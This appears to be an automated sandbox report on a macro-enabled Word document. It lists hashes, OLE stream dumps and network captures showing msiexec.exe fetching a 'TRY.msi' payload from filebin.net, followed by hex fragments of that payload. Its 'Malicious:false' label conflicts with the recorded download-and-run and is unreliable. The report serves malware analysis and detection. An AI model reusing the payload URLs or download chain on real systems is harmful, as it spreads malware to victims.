SHA-256:0A685AF3940988A82CE8310FFE0166E9488CF0A20B1A8D4028362E4B305C73C3
SHA-512:606C8EF4FE9AFF788D76B1457D3A309010A0AB6426F27F92658AC44C717EF0D05B8CAE8D20F11F1348178633A0492513D1A9CE4765C3291681D833EA4C1F8BFE
Malicious:false
Preview:.2022-04-20 09:19:26, Info DPX Started DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Resume and Download Job..2022-04-20 09:19:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-04-20 09:19:26, Info DPX Ended DPX phase: Resume and Download Job..
File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 20 03:06:00 2022, Last Saved Time/Date: Wed Apr 20 03:06:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):6.071377383201628
TrID:
  • Microsoft Word document (32009/1) 54.23%
  • Microsoft Word document (old ver.) (19008/1) 32.20%
  • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:12543_0008858249_FWDOUTSTANDING_20200604.doc
File size:61952
MD5:090e1dfdcbf2185788ea14cd113cc39f
SHA1:6346e143368edbb5a23c8eea9698be2c266311b3
SHA256:3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
SHA512:d4c9b997909b7bfa87090204a4a97179e61c98c10be73000ec68e32af8feddee19ca8c2bc0e9bf9e3cf040d6e0f4f58f2e0f09eef2936528d1f34c506dbb2e98
SSDEEP:768:cAuIiy1a9Tq1aBs8jCjuHF7Y89AOEUYqyxrINSrCqxw+tCc27I/:cAFMm1aidiFk89ABrbr1xrt/2
TLSH:65535CDDF2C2C4BBE12942B5E983C7A6B3BC3E292D1293172574371F3C75924C661269
File Content Preview:........................>.......................h...........k...............g..................................................................................................................................................................................
Icon Hash:e4eea2aaa4b4b4a4
Document Type:OLE
Number of OLE Files:1
Has Summary Info:
Application Name:Microsoft Office Word
Encrypted Document:False
Contains Word Document Stream:True
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:True
Code Page:1252
Title:
Subject:
Author:
Keywords:
Comments:
Template:Normal.dotm
Last Saved By:
Revision Number:1
Total Edit Time:0
Create Time:2022-04-20 02:06:00
Last Saved Time:2022-04-20 02:06:00
Number of Pages:1
Number of Words:0
Number of Characters:1
Creating Application:Microsoft Office Word
Security:0
Document Code Page:1252
Number of Lines:1
Number of Paragraphs:1
Thumbnail Scaling Desired:False
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:1048576
General
Stream Path:Macros/VBA/ThisDocument
VBA File Name:ThisDocument.cls
Stream Size:1773
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . k . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 00 f0 00 00 00 1c 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 23 03 00 00 0b 05 00 00 00 00 00 00 01 00 00 00 bf 6b 0f 39 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:\x1CompObj
File Type:data
Stream Size:114
Entropy:4.2359563651
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
General
Stream Path:\x5DocumentSummaryInformation
File Type:data
Stream Size:4096
Entropy:0.229954151382
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 0b 00 00 00 01 00 00 00 60 00 00 00 05 00 00 00 68 00 00 00 06 00 00 00 70 00 00 00 11 00 00 00 78 00 00 00 17 00 00 00 80 00 00 00 0b 00 00 00 88 00 00 00 10 00 00 00 90 00 00 00 13 00 00 00 98 00 00 00 16 00 00 00 a0 00 00 00
General
Stream Path:\x5SummaryInformation
File Type:data
Stream Size:4096
Entropy:0.414636097734
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 8 . . . . . . . D . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 64 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 06 00 00 00 c8 00 00 00 07 00 00 00 d4 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f4 00 00 00
General
Stream Path:1Table
File Type:data
Stream Size:7133
Entropy:5.86601132644
Base64 Encoded:True
Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
General
Stream Path:Data
File Type:data
Stream Size:32978
Entropy:7.70790581307
Base64 Encoded:False
Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . C . . . " . . . . A . . . . . . . . . . . . . . . . . . . . . . t . h . a . i . . . . . . . . . . . . . . . b . . . 8 . . . . . . d . . A . . . a , . . m S . ? . . . . . . . . . . D . . . . . . . . n . . . . . . . d . . A . . . a , . . m S . ? . . P N G . . . . . . . . I H D R . . . . . . . . . . . . . . . . . . . . . s R G B
Data Raw:d2 80 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 96 19 47 0e e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 46 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 22 00 00 00 04 41 01 00 00 00 05 c1 0a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 74 00 68 00
General
Stream Path:Macros/PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:367
Entropy:5.30381145663
Base64 Encoded:True
Data ASCII:I D = " { 0 6 2 5 E 4 4 A - E 7 6 5 - 4 1 C E - 9 D F D - C 3 4 7 3 6 B 7 5 A 4 6 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 3 C 1 2 6 B 2 3 E B 6 3 E B 6 3 E B 6 3 E B 6 " . . D P B = " D 7 D 5 3 2 A E 5 2 D 6 6 7 D 7 6 7 D 7 6 7 " . . G C = " E B E 9 0 E D A 2 3 D B 2 3 D B D C " . . . . [ H o s t E x t e n d e r I n f o ]
Data Raw:49 44 3d 22 7b 30 36 32 35 45 34 34 41 2d 45 37 36 35 2d 34 31 43 45 2d 39 44 46 44 2d 43 33 34 37 33 36 42 37 35 41 34 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
General
Stream Path: Macros/PROJECTwm
File Type: data
Stream Size: 41
Entropy: 3.07738448508
Base64 Encoded: False
Data ASCII: T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw: 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

General
Stream Path: Macros/VBA/_VBA_PROJECT
File Type: data
Stream Size: 2435
Entropy: 3.97570851109
Base64 Encoded: False
Data ASCII: . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw: cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

General
Stream Path: Macros/VBA/dir
File Type: data
Stream Size: 513
Entropy: 6.23760719085
Base64 Encoded: True
Data ASCII: . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . u a \\ d . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . r . m . .
Data Raw: 01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 75 61 5c 64 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

General
Stream Path: WordDocument
File Type: data
Stream Size: 4096
Entropy: 1.08065186697
Base64 Encoded: False
Data ASCII: . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j D . D . . . . . . . . . . . . . . . . . . . . . . . . . . . & v S h & v S h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: ec a5 c1 00 2d 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 44 1c 44 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 26 76 53 68 26 76 53 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Apr 20, 2022 09:18:54.702529907 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
| Apr 20, 2022 09:18:54.721021891 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
| Apr 20, 2022 09:18:54.721606016 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
| Apr 20, 2022 09:18:54.742054939 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
| Apr 20, 2022 09:18:54.790144920 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8 |
| Apr 20, 2022 09:18:54.810780048 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22 |
| Apr 20, 2022 09:18:55.363713026 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8 |
| Apr 20, 2022 09:18:55.417620897 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22 |
| Apr 20, 2022 09:18:55.451881886 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8 |
| Apr 20, 2022 09:18:55.504235029 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Apr 20, 2022 09:18:54.702529907 CEST | 192.168.2.22 | 8.8.8.8 | 0xce22 | Standard query (0) | filebin.net | A (IP address) | IN (0x0001) |
| Apr 20, 2022 09:18:54.721606016 CEST | 192.168.2.22 | 8.8.8.8 | 0xce22 | Standard query (0) | filebin.net | A (IP address) | IN (0x0001) |
| Apr 20, 2022 09:18:54.790144920 CEST | 192.168.2.22 | 8.8.8.8 | 0x8e74 | Standard query (0) | filebin.net | A (IP address) | IN (0x0001) |
| Apr 20, 2022 09:18:55.363713026 CEST | 192.168.2.22 | 8.8.8.8 | 0x5d20 | Standard query (0) | situla.bitbit.net | A (IP address) | IN (0x0001) |
| Apr 20, 2022 09:18:55.451881886 CEST | 192.168.2.22 | 8.8.8.8 | 0x7ed | Standard query (0) | situla.bitbit.net | A (IP address) | IN (0x0001) |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Apr 20, 2022 09:18:54.721021891 CEST | 8.8.8.8 | 192.168.2.22 | 0xce22 | No error (0) | filebin.net | | 185.47.40.36 | A (IP address) | IN (0x0001) |
| Apr 20, 2022 09:18:54.742054939 CEST | 8.8.8.8 | 192.168.2.22 | 0xce22 | No error (0) | filebin.net | | 185.47.40.36 | A (IP address) | IN (0x0001) |
| Apr 20, 2022 09:18:54.810780048 CEST | 8.8.8.8 | 192.168.2.22 | 0x8e74 | No error (0) | filebin.net | | 185.47.40.36 | A (IP address) | IN (0x0001) |
| Apr 20, 2022 09:18:55.417620897 CEST | 8.8.8.8 | 192.168.2.22 | 0x5d20 | No error (0) | situla.bitbit.net | | 87.238.33.8 | A (IP address) | IN (0x0001) |
| Apr 20, 2022 09:18:55.417620897 CEST | 8.8.8.8 | 192.168.2.22 | 0x5d20 | No error (0) | situla.bitbit.net | | 87.238.33.7 | A (IP address) | IN (0x0001) |
| Apr 20, 2022 09:18:55.504235029 CEST | 8.8.8.8 | 192.168.2.22 | 0x7ed | No error (0) | situla.bitbit.net | | 87.238.33.7 | A (IP address) | IN (0x0001) |
| Apr 20, 2022 09:18:55.504235029 CEST | 8.8.8.8 | 192.168.2.22 | 0x7ed | No error (0) | situla.bitbit.net | | 87.238.33.8 | A (IP address) | IN (0x0001) |
  • filebin.net
  • situla.bitbit.net
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.22 | 49173 | 185.47.40.36 | 443 | C:\Windows\System32\msiexec.exe |

Timestamp: 2022-04-20 07:18:55 UTC, kBytes transferred: 0, Direction: OUT
GET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: filebin.net
Timestamp: 2022-04-20 07:18:55 UTC, kBytes transferred: 0, Direction: IN
HTTP/1.1 302 Found
Cache-Control: max-age=0
Location: https://situla.bitbit.net/filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1
X-Robots-Tag: noindex
Date: Wed, 20 Apr 2022 07:18:55 GMT
Content-Length: 0
X-Varnish: 196823
Age: 0
Via: 1.1 varnish (Varnish/6.0)
Access-Control-Allow-Origin: *
Connection: close


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 1 | 192.168.2.22 | 49174 | 87.238.33.8 | 443 | C:\Windows\System32\msiexec.exe |

Timestamp: 2022-04-20 07:18:55 UTC, kBytes transferred: 0, Direction: OUT
GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: situla.bitbit.net
Timestamp: 2022-04-20 07:18:55 UTC, kBytes transferred: 1, Direction: IN
HTTP/1.1 200 OK
Content-Length: 491520
Accept-Ranges: bytes
Last-Modified: Wed, 20 Apr 2022 01:28:19 GMT
ETag: "260bec1b34ce96e5ed6c42d51e7146fb"
Cache-Control: max-age=30
Content-Disposition: filename="TRY.msi"
x-amz-request-id: tx000000000000000eebd7e-00625fb3df-3b49846f-default
Content-Type: application/msword
Date: Wed, 20 Apr 2022 07:18:55 GMT
Connection: close
Data Ascii: xpwxxw|wgwwxxxwggwxxwxxpxxxxxpx
2022-04-20 07:18:56 UTC401INData Raw: 9c 26 e7 2e 0f 83 41 64 ed 4b 21 10 ce d2 af 87 2a 80 21 97 06 0c 26 75 e7 53 53 2c 0a 72 2b d8 cc 09 a9 20 b7 01 14 52 85 ad 81 fd fe b1 a6 9f a5 f4 dc e6 fb d8 46 1f c7 24 dd 33 8f d8 9b f6 6f 9c 4e 9e 9b f4 c8 c7 db 9d 5c d7 a2 b4 2a 8b ff 34 fd fb fd c4 b8 a4 f4 e8 f7 db 27 72 20 9e 95 1e 16 8e 56 6a 04 7c 90 36 84 49 ab ad 7e f9 97 7f 73 af db ed c7 49 92 12 04 7e 11 fd 97 45 f7 e9 cc 72 6b 32 f7 9e 35 a3 91 82 a3 52 c0 88 17 20 3f f6 ad b1 7f 14 f8 97 45 4f c4 06 14 08 c8 ad cb 65 9a 2c 05 08 46 03 59 96 33 ce e5 65 4e 2b 9b 2f 1a 9a 4d 27 c3 7d e7 a1 f1 b6 e7 eb f7 22 f5 2f da a3 47 47 49 12 c5 f7 ef bf f7 fa a4 6b f3 ae 14 9c 94 2e ff 61 d9 e3 96 8e 04 5c a5 65 73 d9 28 43 21 78 67 30 88 7b 71 9c a2 86 09 30 0a 57 9f d6 64 2e 42 0b 23 de 81 5c 05
Data Ascii: &.AdK!*!&uSS,r+ RF$3oN\*4'r Vj|6I~sI~Erk25R ?EOe,FY3eN+/M'}"/GGIk.a\es(C!xg0{q0Wd.B#\
2022-04-20 07:18:56 UTC417INData Raw: cb 11 5e 9f 06 d3 dc 7d 41 e1 e7 48 7c a8 02 0c 7b db 36 3f 49 7f 27 7f 7e 6b ee a7 40 5d f2 e3 7d 58 6f bb be ef 4e 1d 0a 6d d6 8c 09 29 c0 5c 28 a4 d2 b1 38 2b 59 78 a1 1d 79 42 18 84 fe 0c c9 9d e8 df 91 8e 95 e4 ab bd fb 75 9b fb 70 57 37 20 f9 f5 5a 6b b2 7c c0 b0 28 28 ca 32 7c 8a 21 4a b5 45 69 09 9e 1e 40 62 a1 ca b4 8e 69 4e 6b 2d 83 c1 98 f1 b8 d8 ee f7 eb a0 b7 8d 1c bc 73 1a f0 2e 27 30 1c 0e 4d 96 65 0d e0 bb 37 a8 cb 1c 09 f4 d3 e2 02 42 33 cc d6 3f df df 6f 94 ca f9 e3 c7 8f eb a7 4f bf 12 79 5e 72 7e 71 8e 31 1b 3e f9 e4 1f 78 fa ec 2b 74 96 6f a5 37 b4 8c d6 3d 76 62 e8 2e f3 76 2d 8f fe f6 e9 dc fb d7 72 1b 6d 21 bf 07 84 41 f7 f7 ee be fb fd 13 bb d6 09 10 05 80 47 23 d1 42 d2 58 43 e3 42 bf 01 4c 28 62 2a 87 13 f2 ec 84 c6 3a 5c 63 19
Data Ascii: ^}AH|{6?I'~k@]}XoNm)\(8+YxyBupW7 Zk|((2|!JEi@biNk-s.'0Me7B3?oOy^r~q1>x+to7=vb.v-rm!AG#BXCBL(b*:\c
2022-04-20 07:18:56 UTC433INData Raw: c6 8a 2c 75 ae c1 aa 8a 59 c5 35 45 d5 50 d6 0d 95 cf bb 68 b4 03 41 c3 ef 61 ad 8b c8 48 e1 aa 2f f1 dd 93 94 92 48 a1 5d ca 72 a3 c1 1a e2 38 02 65 a9 6c 89 ad 0d 30 70 89 49 c6 f8 c4 a0 f0 1b 75 31 81 f3 dc 80 b3 02 20 bc 3e b3 8f 65 a3 4c fa 69 50 07 f2 78 a0 05 10 e8 1b df f8 86 00 27 0c fc fb 5f 88 2c 86 27 2e 00 4e 4e 4e 58 2c 16 5a 29 65 42 0f fc 60 5a b6 20 60 00 a2 c2 55 14 d6 25 b3 00 d6 5a ab b5 2e 8c 31 ec ed ed fd 89 37 df 7c f3 c3 ef 7c e7 3b 95 90 62 7c 7c 7c f4 d3 83 83 83 eb 42 46 51 53 e6 58 bb 39 2e bc 1f 01 e8 32 7b 77 5b d8 be 16 4a 6b c0 ab 35 ff 7d e5 5f 92 24 4c 26 13 46 a3 11 79 9e b3 58 2c 30 c6 0d f3 3c 3e 3e a2 ae 4a c6 7b 7b ae 9d b7 8c 5d f9 ae 14 a0 24 c2 0f b1 70 4c e0 46 81 c7 42 92 8c 52 46 d9 80 38 49 68 ea 86 b2 2c b0
Data Ascii: ,uY5EPhAaH/H]r8el0pIu1 >eLiPx'_,'.NNNX,Z)eB`Z `U%Z.17||;b|||BFQSX9.2{w[Jk5}_$L&FyX,0<>>J{{]$pLFBRF8Ih,
2022-04-20 07:18:56 UTC449INData Raw: 71 ee 07 d4 fd 94 b0 7b 35 4d 5f cb 35 a1 0b ae 25 18 2b ad 32 56 6e 1d ce d3 fe 62 11 a0 50 b0 f0 c6 1b e7 0a 07 0e 1c 7c 2f 97 9b 78 fc d2 a5 c1 7f a0 64 c2 cb f7 ef df 1f 2d f4 95 13 fb 22 53 de 38 6c 45 3a 35 8e e2 96 7e ab 2e 02 56 4a 03 ad 48 07 9d 20 a8 38 a4 94 66 62 1e b4 53 4e 5c 75 89 70 26 93 25 9f af b3 c8 78 df 17 1f 8e b6 1b 2f ff fd c4 6b a7 28 d3 7b 08 21 6b 1c e9 6e 92 81 7b 3b 43 b0 dd f6 dc cd cc 73 6f 21 52 ac 37 34 d2 d3 cb 2d a1 13 97 7a 41 91 d8 3e e0 04 14 b6 e4 70 1d 1d 96 3d 83 c2 ac 00 a5 02 82 eb d0 8d 04 28 13 28 58 0e 2c cb 81 27 03 48 0a 7c 34 3d 85 e2 f0 79 2a 6d 07 8c 72 c6 18 83 ef fb 11 61 5d d3 41 e6 27 3f f9 ce 65 00 97 33 99 cc af 00 e0 c0 81 e3 1b ec 59 eb eb 80 7a 84 52 d6 af 69 7a 2f e7 42 70 2e 44 78 0a 0f a4 f4
Data Ascii: q{5M_5%+2VnbP|/xd-"S8lE:5~.VJH 8fbSN\up&%x/k({!kn{;Cso!R74-zA>p=((X,'H|4=y*mra]A'?e3YzRiz/Bp.Dx
2022-04-20 07:18:56 UTC465INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5b 5c 5c 3f 3e 3e 3d f5 8f 87 8a ff b0 b2 b2 ff 9b ae 87 ff b2 ad 8b ff e6 e2 e1 ff ec e9 e4 ff ca c9 c7 ff 97 95 99 ff 94 90 97 ff 99 91 99 ff aa b8 c9 ff bd b9 bf ff e5 c3 c2 ff f8 f1 f1 ff c2 b7 b7 ff e4 d4 d4 ff b6 9b 9b f4 a4 85 85 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5d 5e 5e 40 4a 41 43 f6 7f a4 97 ff 4e e3 9d ff 77 b4 7b ff a4 9f 98 ff c7 c5 c6 ff ea e8 e7 ff da da da ff b1 b2 b2 ff 9a 98 96 ff 99 9b 9c ff 87 be e1 ff ad ba c7 ff e8 c6 c5 ff fa f2 f2 ff c2 b7 b9 ff e7 d6 d6 ff b7 9c 9c f4 a1 83 83 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 5f 5f 41 51 46 4a f6 95 c2 b0 ff 5a c7 9b ff 9d 9e 9f ff b5 b2 b4 ff ce ce ce ff f0 f0 f0 ff f0 f0 f0 ff cd cd ce ff b8 b2 ae ff a7 be ce
